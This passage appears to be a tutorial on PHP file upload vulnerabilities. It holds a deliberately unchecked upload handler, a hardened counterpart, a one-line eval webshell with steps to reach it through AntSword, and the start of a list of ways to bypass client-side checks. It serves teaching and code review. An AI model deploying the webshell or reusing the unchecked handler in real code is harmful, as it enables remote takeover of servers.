0x00 Vulnerability profile
A file upload vulnerability lets a user upload an executable script file and, through that file, gain the ability to run commands on the server. This is the most direct and effective kind of attack. "File upload" itself is not the problem; the problem is how the server handles and interprets the file once it has been uploaded. If the server's processing logic is not secure enough, the consequences are serious.
0x01 Vulnerability conditions
- Files can be uploaded
- The path where the uploaded file is stored is known
- The uploaded file can be accessed
- The uploaded file can be executed
0x02 Hunting approach
All upload points usually call the same class, so search the code base globally for the upload function.
Alternatively, find the upload points black-box style, then locate the code behind them.
0x03 Writing an upload handler
Let's write a front-end upload form
<html>
<head>
<meta charset="UTF-8">
<title>upload.html</title>
</head>
<body>
<form action="upload.php" method="post" enctype="multipart/form-data">
<input type="file" name="file">
<input type="submit" value="Upload file">
<!-- <input type="hidden" name="MAX_FILE_SIZE" value="4098"> sets the upload size limit (it must precede the file input); normally this is set in php.ini -->
</form>
</body>
</html>
Write the PHP upload handler
<?php
// Deliberately minimal handler: no check of the file name, extension, type or contents.
$upload_dir = 'D:\PHPSTUDY2018\PHPTutorial\WWW\upload';
if (isset($_FILES['file'])) {
    // $_FILES['file'] is an array; the original file name is in ['name']
    $upload_name = $upload_dir . '\\' . $_FILES['file']['name'];
    move_uploaded_file($_FILES['file']['tmp_name'], $upload_name);
    echo "Type:" . $_FILES['file']['type'] . "<br>";
    echo "Size:" . ($_FILES['file']['size'] / 1024) . "<br>";
    echo "Name:" . $_FILES['file']['name']; // these three lines just show the upload result
} else {
    echo "Upload failed";
}
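A hardened counterpart to the upload.php above, added here as an example and not part of the original post. It assumes the same form field name "file", a storage directory outside the web root (the path is a placeholder) and a whitelist of three image types; every check is done on the server, so a client-side JavaScript check being removed or edited makes no difference.

```php
<?php
// Hardened upload handler (added example). Assumed: field name "file",
// a directory outside the web root, and an image-only whitelist.
$upload_dir = __DIR__ . '/../private_uploads';   // placeholder, not web-reachable
$allowed   = ['jpg' => 'image/jpeg', 'png' => 'image/png', 'gif' => 'image/gif'];
$max_bytes = 2 * 1024 * 1024;

function reject(string $msg): void {
    http_response_code(400);
    exit(htmlspecialchars($msg, ENT_QUOTES, 'UTF-8'));
}

if (!isset($_FILES['file']) || !is_array($_FILES['file'])) {
    reject('No file uploaded');
}
$f = $_FILES['file'];

if ($f['error'] !== UPLOAD_ERR_OK) {
    reject('Upload failed (error code ' . (int)$f['error'] . ')');
}
if (!is_uploaded_file($f['tmp_name'])) {   // really came from this request's multipart body
    reject('Invalid upload');
}
if ($f['size'] > $max_bytes) {
    reject('File too large');
}

// Extension whitelist on the LAST extension only, lower-cased:
// "shell.php.jpg" is judged on "jpg", "a.PHP" on "php".
$ext = strtolower(pathinfo($f['name'], PATHINFO_EXTENSION));
if (!isset($allowed[$ext])) {
    reject('File type not allowed');
}

// Sniff the bytes; $_FILES['file']['type'] is client-supplied and never trusted.
$finfo = new finfo(FILEINFO_MIME_TYPE);
if ($finfo->file($f['tmp_name']) !== $allowed[$ext]) {
    reject('File content does not match its extension');
}

// Server-chosen random name: the uploader controls neither path nor extension.
$new_name = bin2hex(random_bytes(16)) . '.' . $ext;
if (!is_dir($upload_dir) && !mkdir($upload_dir, 0750, true)) {
    reject('Storage unavailable');
}
if (!move_uploaded_file($f['tmp_name'], $upload_dir . '/' . $new_name)) {
    reject('Could not store file');
}
echo 'Stored as ' . htmlspecialchars($new_name, ENT_QUOTES, 'UTF-8');
```

Because the stored file keeps only a whitelisted image extension, gets a random name and lives outside the web root, none of the four conditions in 0x01 (known path, reachable, executable) holds even if the upload itself succeeds.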
Write a one-line webshell (一句话木马)
<?php
// executes whatever is POSTed in parameter 777; "@" suppresses error output
@eval($_POST['777']);
?>
Upload it:
The upload succeeds.
Then connect to it with AntSword (蚁剑) and you are in.
This is the simplest possible example; use it to start shifting yourself toward white-box review, and accumulate experience gradually.
0x04 Bypassing file upload checks
1. Bypassing client-side (JavaScript) checks
Detection principle
The client uses JavaScript code to check whether the file the user submits is legitimate.
Bypass methods
- Add the wanted type to the list of allowed upload types, so the file you want to upload counts as legitimate.
- Remove the call to the JS validation script so that it can no longer check the uploaded file type. Do this by inspecting the element in the browser and viewing the contents of the form; the form's start tag is